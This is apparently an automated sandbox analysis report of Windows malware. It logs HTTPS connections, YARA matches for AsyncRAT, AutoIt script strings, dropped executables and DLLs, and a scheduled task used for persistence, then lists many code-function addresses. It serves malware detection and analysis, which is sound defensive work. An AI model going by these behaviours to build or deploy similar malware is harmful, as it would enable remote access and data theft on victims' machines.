Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49934
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49933
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49811

Source: unknown	HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.7:49702 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.32.185.164:443 -> 192.168.2.7:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.7:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.32.185.164:443 -> 192.168.2.7:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.7:49775 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.7:49784 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.7:49851 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.7:49954 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.7:49975 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.7:50005 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 27.2.qk4EiZw.exe.1c0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000001B.00000003.2205328066.0000000005030000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000001B.00000002.2503940481.00000000001C2000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen

Binary is likely a compiled AutoIt script file

Source: e0da62c8af.exe, 0000001F.00000002.2505798261.00000000006F2000.00000002.00000001.01000000.00000014.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_9b0056a8-4
Source: e0da62c8af.exe, 0000001F.00000002.2505798261.00000000006F2000.00000002.00000001.01000000.00000014.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_5091280f-5
Source: e0da62c8af.exe.25.dr	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_666b27a3-2
Source: e0da62c8af.exe.25.dr	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_a6978a01-d
Source: random[2].exe.25.dr	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_16aab73f-2
Source: random[2].exe.25.dr	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_576047dc-d

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: random[1].exe.0.dr	Static PE information: section name:
Source: random[1].exe.0.dr	Static PE information: section name: .idata
Source: AAAAECGHCB.exe.0.dr	Static PE information: section name:
Source: AAAAECGHCB.exe.0.dr	Static PE information: section name: .idata
Source: skotes.exe.20.dr	Static PE information: section name:
Source: skotes.exe.20.dr	Static PE information: section name: .idata
Source: random[1].exe.25.dr	Static PE information: section name:
Source: random[1].exe.25.dr	Static PE information: section name: .idata
Source: random[1].exe.25.dr	Static PE information: section name:
Source: 9faf801df7.exe.25.dr	Static PE information: section name:
Source: 9faf801df7.exe.25.dr	Static PE information: section name: .idata
Source: 9faf801df7.exe.25.dr	Static PE information: section name:
Source: random[1].exe0.25.dr	Static PE information: section name:
Source: random[1].exe0.25.dr	Static PE information: section name: .idata
Source: 0fb4fa91ba.exe.25.dr	Static PE information: section name:
Source: 0fb4fa91ba.exe.25.dr	Static PE information: section name: .idata
Source: qk4EiZw[1].exe.25.dr	Static PE information: section name:
Source: qk4EiZw[1].exe.25.dr	Static PE information: section name: .idata
Source: qk4EiZw[1].exe.25.dr	Static PE information: section name:
Source: qk4EiZw.exe.25.dr	Static PE information: section name:
Source: qk4EiZw.exe.25.dr	Static PE information: section name: .idata
Source: qk4EiZw.exe.25.dr	Static PE information: section name:

Source: C:\Users\user\Documents\AAAAECGHCB.exe

File created: C:\Windows\Tasks\skotes.job

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CE0ECC0	0_2_6CE0ECC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CE6ECD0	0_2_6CE6ECD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CE1AC60	0_2_6CE1AC60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CEEAC30	0_2_6CEEAC30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CED6C00	0_2_6CED6C00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CF9CDC0	0_2_6CF9CDC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CE14DB0	0_2_6CE14DB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CEA6D90	0_2_6CEA6D90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CEDED70	0_2_6CEDED70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CF3AD50	0_2_6CF3AD50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CF98D20	0_2_6CF98D20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CE1AEC0	0_2_6CE1AEC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CEB0EC0	0_2_6CEB0EC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CE96E90	0_2_6CE96E90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CEAEE70	0_2_6CEAEE70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CEF0E20	0_2_6CEF0E20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CE10FE0	0_2_6CE10FE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CEEEFF0	0_2_6CEEEFF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CF58FB0	0_2_6CF58FB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CE1EFB0	0_2_6CE1EFB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CED2F70	0_2_6CED2F70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CE7EF40	0_2_6CE7EF40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CF50F20	0_2_6CF50F20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CE16F10	0_2_6CE16F10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CF168E0	0_2_6CF168E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CEE4840	0_2_6CEE4840
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CE60820	0_2_6CE60820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CE9A820	0_2_6CE9A820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CF2C9E0	0_2_6CF2C9E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CE449F0	0_2_6CE449F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CEA09A0	0_2_6CEA09A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CECA9A0	0_2_6CECA9A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CED09B0	0_2_6CED09B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CE48960	0_2_6CE48960
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CE66900	0_2_6CE66900
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CE8EA80	0_2_6CE8EA80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CE8CA70	0_2_6CE8CA70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CEC8A30	0_2_6CEC8A30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CEBEA00	0_2_6CEBEA00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CF16BE0	0_2_6CF16BE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CEB0BA0	0_2_6CEB0BA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CE564D0	0_2_6CE564D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CEAA4D0	0_2_6CEAA4D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CF3A480	0_2_6CF3A480
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CE28460	0_2_6CE28460
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CE74420	0_2_6CE74420
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CE9A430	0_2_6CE9A430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CEDA5E0	0_2_6CEDA5E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CE9E5F0	0_2_6CE9E5F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CE045B0	0_2_6CE045B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CE72560	0_2_6CE72560
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CEB0570	0_2_6CEB0570
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CF58550	0_2_6CF58550
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CE68540	0_2_6CE68540
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CF14540	0_2_6CF14540
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CE6E6E0	0_2_6CE6E6E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CEAE6E0	0_2_6CEAE6E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CE346D0	0_2_6CE346D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CE6C650	0_2_6CE6C650
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CE3A7D0	0_2_6CE3A7D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CE90700	0_2_6CE90700
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CE200B0	0_2_6CE200B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CEEC0B0	0_2_6CEEC0B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CE08090	0_2_6CE08090
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CE5E070	0_2_6CE5E070
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CEDC000	0_2_6CEDC000
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CED8010	0_2_6CED8010
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CE101E0	0_2_6CE101E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CE78140	0_2_6CE78140
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CE86130	0_2_6CE86130
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CEF4130	0_2_6CEF4130
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CF962C0	0_2_6CF962C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CEE22A0	0_2_6CEE22A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CEDE2B0	0_2_6CEDE2B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CE98260	0_2_6CE98260
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CEA8250	0_2_6CEA8250
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CEE8220	0_2_6CEE8220
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CEDA210	0_2_6CEDA210
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CE643E0	0_2_6CE643E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CE423A0	0_2_6CE423A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CE6E3B0	0_2_6CE6E3B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CF52370	0_2_6CF52370
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CE12370	0_2_6CE12370
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CF2C360	0_2_6CF2C360
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CEA6370	0_2_6CEA6370
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CE18340	0_2_6CE18340
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CE82320	0_2_6CE82320
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CED1CE0	0_2_6CED1CE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CF4DCD0	0_2_6CF4DCD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CEAFC80	0_2_6CEAFC80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CE13C40	0_2_6CE13C40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CF39C40	0_2_6CF39C40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CE21C30	0_2_6CE21C30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CEE1DC0	0_2_6CEE1DC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CE03D80	0_2_6CE03D80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CF59D90	0_2_6CF59D90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CE73D00	0_2_6CE73D00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CE33EC0	0_2_6CE33EC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CF6BE70	0_2_6CF6BE70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CF95E60	0_2_6CF95E60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CF1DE10	0_2_6CF1DE10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CEBBFF0	0_2_6CEBBFF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CF2DFC0	0_2_6CF2DFC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CF93FC0	0_2_6CF93FC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CE31F90	0_2_6CE31F90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CE45F20	0_2_6CE45F20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CE05F30	0_2_6CE05F30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CF67F20	0_2_6CF67F20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CE1D8E0	0_2_6CE1D8E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CE438E0	0_2_6CE438E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CF6B8F0	0_2_6CF6B8F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CEEF8F0	0_2_6CEEF8F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CEAF8C0	0_2_6CEAF8C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CEE3840	0_2_6CEE3840
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CE6D810	0_2_6CE6D810
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CE759F0	0_2_6CE759F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CEA79F0	0_2_6CEA79F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CEA99C0	0_2_6CEA99C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CE499D0	0_2_6CE499D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CE21980	0_2_6CE21980
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CEE1990	0_2_6CEE1990
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CE8F960	0_2_6CE8F960
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CECD960	0_2_6CECD960
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CEC5920	0_2_6CEC5920
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CF5F900	0_2_6CF5F900
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CE11AE0	0_2_6CE11AE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CEEDAB0	0_2_6CEEDAB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CF99A50	0_2_6CF99A50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CF0DA30	0_2_6CF0DA30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CE4FA10	0_2_6CE4FA10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CEB1A10	0_2_6CEB1A10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CE57BF0	0_2_6CE57BF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CE69BA0	0_2_6CE69BA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CED9BB0	0_2_6CED9BB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CE01B80	0_2_6CE01B80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CEF5B90	0_2_6CEF5B90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CEEFB60	0_2_6CEEFB60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CE5BB20	0_2_6CE5BB20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CE114E0	0_2_6CE114E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CF914A0	0_2_6CF914A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CEF9430	0_2_6CEF9430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CE9D410	0_2_6CE9D410
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CE955F0	0_2_6CE955F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CE49590	0_2_6CE49590
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CF5F510	0_2_6CF5F510
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CE77500	0_2_6CE77500
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CE25510	0_2_6CE25510
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CE416A0	0_2_6CE416A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CE796A0	0_2_6CE796A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CE65640	0_2_6CE65640
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CE29650	0_2_6CE29650
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CE39600	0_2_6CE39600
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CE87610	0_2_6CE87610
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CF537C0	0_2_6CF537C0
Source: C:\Users\user\Documents\AAAAECGHCB.exe	Code function: 20_2_00545C83	20_2_00545C83
Source: C:\Users\user\Documents\AAAAECGHCB.exe	Code function: 20_2_0054735A	20_2_0054735A
Source: C:\Users\user\Documents\AAAAECGHCB.exe	Code function: 20_2_00588860	20_2_00588860
Source: C:\Users\user\Documents\AAAAECGHCB.exe	Code function: 20_2_00544DE0	20_2_00544DE0
Source: C:\Users\user\Documents\AAAAECGHCB.exe	Code function: 20_2_00657B6E	20_2_00657B6E
Source: C:\Users\user\Documents\AAAAECGHCB.exe	Code function: 20_2_00544B30	20_2_00544B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_00288860	21_2_00288860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_00287049	21_2_00287049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_002878BB	21_2_002878BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_002831A8	21_2_002831A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_00244B30	21_2_00244B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_00282D10	21_2_00282D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_00244DE0	21_2_00244DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_00277F36	21_2_00277F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_0028779B	21_2_0028779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 22_2_00288860	22_2_00288860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 22_2_00287049	22_2_00287049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 22_2_002878BB	22_2_002878BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 22_2_002831A8	22_2_002831A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 22_2_00244B30	22_2_00244B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 22_2_00282D10	22_2_00282D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 22_2_00244DE0	22_2_00244DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 22_2_00277F36	22_2_00277F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 22_2_0028779B	22_2_0028779B

Source: Joe Sandbox View

Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA

Source: C:\Users\user\Documents\AAAAECGHCB.exe	Code function: String function: 005580C0 appears 130 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 002580C0 appears 260 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 0025DF80 appears 36 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6CE33620 appears 96 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6CF909D0 appears 342 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6CF49F30 appears 53 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6CF9DAE0 appears 84 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6CF9D930 appears 66 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6CE39B10 appears 109 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6CE6C5E0 appears 35 times

Source: file.exe, 00000000.00000002.1903744525.0000000070152000.00000002.00000001.01000000.0000000A.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe
Source: file.exe, 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 27.2.qk4EiZw.exe.1c0000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000001B.00000003.2205328066.0000000005030000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
